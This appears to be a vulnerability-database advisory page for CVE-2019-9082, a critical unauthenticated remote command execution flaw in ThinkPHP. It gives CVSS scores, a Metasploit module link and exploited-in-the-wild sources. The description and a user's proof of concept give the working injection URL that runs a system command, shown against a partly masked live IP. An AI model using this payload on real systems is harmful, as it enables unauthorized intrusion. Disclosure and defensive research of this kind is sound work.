Attacker Value

Unknown

(1 user assessed)

Exploitability

Unknown

(1 user assessed)

User Interaction

CVE-2019-9082

Disclosure Date: February 24, 2019 •

CVE-2019-9082 CVSS v3 Base Score: 9.8

Exploited in the Wild

Reported by gwillcox-r7
View Source Details

MITRE ATT&CK

Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Metasploit Module

ThinkPHP Multiple PHP Injection RCEs

Description

ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.

Add Assessment

Mad-robot (37)

July 05, 2020 1:53pm UTC (4 years ago)•Edited 4 years ago

Ratings

Common in enterprise Easy to weaponize Gives privileged access Unauthenticated Vulnerable in default configuration

Technical Analysis

ThinkPHP RCE

DESCRIPTION

PROOF OF CONCEPT
The RCE(Remote Command Execution) vulnerability is triggered by a http request.Successfully executed the command “whoami”.
poc:

http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

9.8 Critical

Impact Score:

5.9

Exploitability Score:

3.9

Vector:

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

None

User Interaction (UI):

None

Scope (S):

Unchanged

Confidentiality (C):

High

Integrity (I):

High

Availability (A):

High

Vendors

opensourcebms,
thinkphp,
zzzcms

Products

open source background management system 1.1.1,
thinkphp,
zzzphp 1.6.1

Metasploit Modules

ThinkPHP Multiple PHP Injection RCEs (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/thinkphp_rce.rb)

Exploited in the Wild

Reported by:

gwillcox-r7 indicated sources as

Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
Threat Feed (https://fortiguard.fortinet.com/outbreak-alert/thinkphp-rce)
News Article or Blog (https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo)

Reported: November 03, 2021 4:15pm UTC (3 years ago) • Edited 1 year ago

References

Rapid7

Unknown

CVE-2019-9082

Unknown

Unknown

None

None

Network

CVE-2019-9082

Description

Add Assessment

Ratings

Technical Analysis

CVSS V3 Severity and Metrics

General Information

Vendors

Products

Metasploit Modules

Exploited in the Wild

References

Canonical

Advisory

Miscellaneous

Additional Info

Technical Analysis

Unknown

CVE-2019-9082

Unknown

Unknown

None

None

Network

CVE-2019-9082

Description

Add Assessment

Ratings

Technical Analysis

CVSS V3 Severity and Metrics

General Information

Vendors

Products

Metasploit Modules

Exploited in the Wild

References

Canonical

Advisory

Miscellaneous

Additional Info

Technical Analysis

Quick Cookie Notification